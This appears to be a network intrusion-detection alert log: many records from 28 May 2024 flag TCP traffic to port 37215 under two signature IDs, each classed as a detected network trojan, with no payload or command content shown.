            Timestamp:05/28/24-09:57:32.057423
            SID:2829579
            Source Port:57550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.299915
            SID:2835222
            Source Port:41318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904124
            SID:2835222
            Source Port:33430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.924521
            SID:2835222
            Source Port:55618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575891
            SID:2835222
            Source Port:49048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870245
            SID:2835222
            Source Port:32846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847402
            SID:2829579
            Source Port:47828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857043
            SID:2829579
            Source Port:59572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.087047
            SID:2835222
            Source Port:40154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927221
            SID:2829579
            Source Port:47748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916738
            SID:2835222
            Source Port:34312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969247
            SID:2835222
            Source Port:38178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923536
            SID:2829579
            Source Port:40896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779015
            SID:2835222
            Source Port:43694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864855
            SID:2829579
            Source Port:58454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744767
            SID:2835222
            Source Port:53606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533671
            SID:2835222
            Source Port:53036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864496
            SID:2829579
            Source Port:38440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279518
            SID:2829579
            Source Port:55232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887275
            SID:2835222
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851987
            SID:2835222
            Source Port:58954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847271
            SID:2829579
            Source Port:45396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771798
            SID:2829579
            Source Port:59208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988154
            SID:2829579
            Source Port:54032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854909
            SID:2829579
            Source Port:50338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.616253
            SID:2835222
            Source Port:39456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.464951
            SID:2835222
            Source Port:36368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2835222
            Source Port:56350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.652075
            SID:2829579
            Source Port:37780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.356366
            SID:2835222
            Source Port:51780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062691
            SID:2829579
            Source Port:42282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486543
            SID:2835222
            Source Port:48102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.843782
            SID:2829579
            Source Port:43990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869899
            SID:2835222
            Source Port:56812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916806
            SID:2829579
            Source Port:45908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709616
            SID:2835222
            Source Port:56614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021774
            SID:2829579
            Source Port:54840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716057
            SID:2829579
            Source Port:43690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500187
            SID:2829579
            Source Port:41678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864716
            SID:2829579
            Source Port:34648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332153
            SID:2835222
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542643
            SID:2835222
            Source Port:42776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.019944
            SID:2835222
            Source Port:37942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061435
            SID:2835222
            Source Port:38172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828197
            SID:2835222
            Source Port:46726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999438
            SID:2829579
            Source Port:40402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644366
            SID:2835222
            Source Port:33212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565815
            SID:2835222
            Source Port:32904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435751
            SID:2835222
            Source Port:42600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782663
            SID:2829579
            Source Port:58378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047832
            SID:2835222
            Source Port:36764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830619
            SID:2835222
            Source Port:49386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.565142
            SID:2835222
            Source Port:41884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862670
            SID:2835222
            Source Port:56618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519617
            SID:2829579
            Source Port:60540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809829
            SID:2829579
            Source Port:59458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897864
            SID:2835222
            Source Port:49522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793867
            SID:2835222
            Source Port:53814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737601
            SID:2835222
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764933
            SID:2835222
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039067
            SID:2829579
            Source Port:41210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330614
            SID:2829579
            Source Port:57410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897399
            SID:2829579
            Source Port:58800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972790
            SID:2835222
            Source Port:45812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.716660
            SID:2835222
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.072445
            SID:2835222
            Source Port:35228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067953
            SID:2829579
            Source Port:53828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936887
            SID:2835222
            Source Port:38880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786905
            SID:2829579
            Source Port:47822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777589
            SID:2835222
            Source Port:45174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065497
            SID:2829579
            Source Port:45062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926411
            SID:2829579
            Source Port:56236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039725
            SID:2835222
            Source Port:34062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767855
            SID:2829579
            Source Port:53488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.358486
            SID:2829579
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743266
            SID:2829579
            Source Port:32974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059098
            SID:2829579
            Source Port:39900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335452
            SID:2835222
            Source Port:53506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895718
            SID:2835222
            Source Port:44064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012422
            SID:2829579
            Source Port:43834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644064
            SID:2829579
            Source Port:55404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863779
            SID:2829579
            Source Port:57552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.480910
            SID:2829579
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895464
            SID:2829579
            Source Port:54654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344982
            SID:2835222
            Source Port:37660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322622
            SID:2835222
            Source Port:49900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623305
            SID:2835222
            Source Port:33528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902404
            SID:2829579
            Source Port:44350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.781875
            SID:2829579
            Source Port:39128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070253
            SID:2829579
            Source Port:38344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770849
            SID:2835222
            Source Port:51046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279517
            SID:2835222
            Source Port:60636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824775
            SID:2835222
            Source Port:56970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900558
            SID:2835222
            Source Port:48880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.923557
            SID:2835222
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.809190
            SID:2829579
            Source Port:38614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295954
            SID:2835222
            Source Port:38828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893849
            SID:2829579
            Source Port:47874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435399
            SID:2829579
            Source Port:50636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669391
            SID:2835222
            Source Port:37392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734208
            SID:2835222
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.707983
            SID:2835222
            Source Port:44710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.159095
            SID:2835222
            Source Port:44050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299415
            SID:2829579
            Source Port:49734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.206564
            SID:2835222
            Source Port:54682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843153
            SID:2835222
            Source Port:46488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380354
            SID:2835222
            Source Port:37156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790082
            SID:2835222
            Source Port:46620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789112
            SID:2829579
            Source Port:49280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887732
            SID:2829579
            Source Port:40356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754765
            SID:2835222
            Source Port:56208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735676
            SID:2829579
            Source Port:43704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445267
            SID:2829579
            Source Port:35380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848250
            SID:2829579
            Source Port:44252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915272
            SID:2835222
            Source Port:49384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764918
            SID:2835222
            Source Port:54118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721357
            SID:2829579
            Source Port:56886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045151
            SID:2829579
            Source Port:42926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059770
            SID:2829579
            Source Port:41262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.563744
            SID:2829579
            Source Port:55848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909638
            SID:2835222
            Source Port:47448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047946
            SID:2835222
            Source Port:45580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279785
            SID:2835222
            Source Port:35508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508292
            SID:2829579
            Source Port:40130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717750
            SID:2835222
            Source Port:33062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.617001
            SID:2829579
            Source Port:54214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737281
            SID:2835222
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956239
            SID:2829579
            Source Port:57984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.076223
            SID:2835222
            Source Port:55346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873495
            SID:2835222
            Source Port:42758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563770
            SID:2829579
            Source Port:59148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808869
            SID:2835222
            Source Port:56008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852842
            SID:2829579
            Source Port:42542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842830
            SID:2829579
            Source Port:39180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848431
            SID:2829579
            Source Port:39334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872199
            SID:2829579
            Source Port:59614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737183
            SID:2829579
            Source Port:54446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.010203
            SID:2835222
            Source Port:57822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414009
            SID:2835222
            Source Port:53220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736999
            SID:2835222
            Source Port:36014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897836
            SID:2835222
            Source Port:48982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.939051
            SID:2835222
            Source Port:36490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946718
            SID:2835222
            Source Port:33290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276707
            SID:2835222
            Source Port:48558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985373
            SID:2835222
            Source Port:53544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380636
            SID:2835222
            Source Port:52958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.730135
            SID:2829579
            Source Port:53298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326561
            SID:2829579
            Source Port:39818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860853
            SID:2829579
            Source Port:40576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880211
            SID:2835222
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.306140
            SID:2829579
            Source Port:35852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.169893
            SID:2835222
            Source Port:34956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543510
            SID:2835222
            Source Port:37496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767091
            SID:2835222
            Source Port:50692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777536
            SID:2829579
            Source Port:51182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386716
            SID:2835222
            Source Port:36114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772528
            SID:2829579
            Source Port:60790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002253
            SID:2829579
            Source Port:50602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714952
            SID:2829579
            Source Port:42458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954153
            SID:2829579
            Source Port:39228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904178
            SID:2829579
            Source Port:52296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.618272
            SID:2829579
            Source Port:52648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776966
            SID:2835222
            Source Port:37932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601822
            SID:2829579
            Source Port:48450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067126
            SID:2835222
            Source Port:39400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862918
            SID:2835222
            Source Port:57122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066107
            SID:2835222
            Source Port:53098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434529
            SID:2835222
            Source Port:59622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760329
            SID:2835222
            Source Port:50854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557998
            SID:2829579
            Source Port:52510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643860
            SID:2829579
            Source Port:42438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809448
            SID:2835222
            Source Port:51452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979650
            SID:2829579
            Source Port:54484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808992
            SID:2835222
            Source Port:45208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842661
            SID:2835222
            Source Port:45664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865936
            SID:2829579
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.726544
            SID:2835222
            Source Port:51464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932685
            SID:2829579
            Source Port:56290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.557791
            SID:2829579
            Source Port:33570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.113494
            SID:2829579
            Source Port:57438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773683
            SID:2829579
            Source Port:40890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604994
            SID:2829579
            Source Port:34578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.383278
            SID:2835222
            Source Port:49278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837519
            SID:2835222
            Source Port:56556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.835944
            SID:2835222
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433207
            SID:2829579
            Source Port:47600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860571
            SID:2829579
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824238
            SID:2829579
            Source Port:39016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846656
            SID:2835222
            Source Port:41908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915246
            SID:2835222
            Source Port:53140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777789
            SID:2829579
            Source Port:53378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762981
            SID:2835222
            Source Port:47112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260826
            SID:2835222
            Source Port:41574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777733
            SID:2829579
            Source Port:49690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928749
            SID:2835222
            Source Port:46628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818124
            SID:2829579
            Source Port:46654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.946906
            SID:2829579
            Source Port:41772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779025
